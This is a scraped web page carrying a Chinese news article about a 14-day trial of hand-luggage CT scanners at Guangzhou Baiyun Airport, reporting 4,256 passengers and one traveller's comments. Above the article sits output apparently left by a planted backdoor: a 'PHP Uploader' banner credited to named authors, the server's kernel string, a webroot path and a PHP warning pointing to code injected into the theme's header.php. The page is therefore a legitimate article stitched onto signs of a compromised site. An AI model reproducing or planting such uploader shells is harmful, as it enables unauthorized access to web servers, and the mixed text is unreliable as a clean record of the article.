PHP Uploader - By Phenix-TN & Mr.Anderson
Linux iZwz91hdhujjzqy9icuvwuZ 5.4.0-31-generic #35-Ubuntu SMP Thu May 7 20:20:34 UTC 2020 x86_64
okokok/www/wwwroot/aircn/new_wordpress/wordpressokokok
Warning: Use of undefined constant itongtong - assumed 'itongtong' (this will throw an Error in a future version of PHP) in /www/wwwroot/aircn/new_wordpress/wordpress/wp-content/themes/newsbulk/header.php(29) : runtime-created function on line 1

1.jpg

试用仅仅14天,“尝新”旅客就有4256人!

  作为民航局首批试用单位,“手提行李CT安检设备”通道自9月1日在广州白云机场启用后颇受关注。

  新手提CT安检设备设置在白云机场T1航站楼B区18号安检通道,外观与普通X射线机相差无几,但其显著特点在于,能对过检行李生成的三维图像、切片图像,并根据数字分析,进行初步的自动识别和爆炸物排查。安检开机员和开包员均可以直接通过触屏进行360度自由旋转,让行李变得“透明”,实现排查物品的快、准、精,有效解决原来图像遮挡、重复倒包等问题,安全性、可靠性有增无减,同时对于通道验放效率和旅客过检体验提升不少。

2.jpg

  据白云机场安检专业人士介绍,试用初期,旅客仍需将电脑等单独取出过机。但随着试用进行,人机配合越来越默契,流程和仪器参数得到进一步优化,预期不久的将来,可实现旅客“放包就过”的目标,让安检员安心检查、旅客轻松过检。

  旅客李先生,虽看到通道前有“使用新技术,检查时间略有增加”的温馨提醒,但其表示并不介意,体验过后表示:我是白云机场的常客,也是新技术的铁粉,从“二维码过检”到“一证通关”,再到“OneID”这些全都第一时间体验,希望这项行李检查新技术也能更好推广运用,服务旅客便捷出行。

  广州白云机场安检拥有雄厚的业务人才和技术力量,此次手提CT安检设备使用是继二维码过检、易安检等多项新技术后,民航局又一次将白云安检作为首批试点。近年,白云安检大力推进“智慧民航”建设,聚焦“提质增效”和“真情服务”,以科技保安全,以智慧促服务,相继在业内创推二维码过检、人脸识别、智能旅检系统、3D宣导台及易安检等新模式、新技术、新设备运用,不断适应新常态,持续引领行业发展。

来源:民航资源网,作者:孙志彬、袁琳图:余俊杰、郭俊毅

作者 一潼

发表回复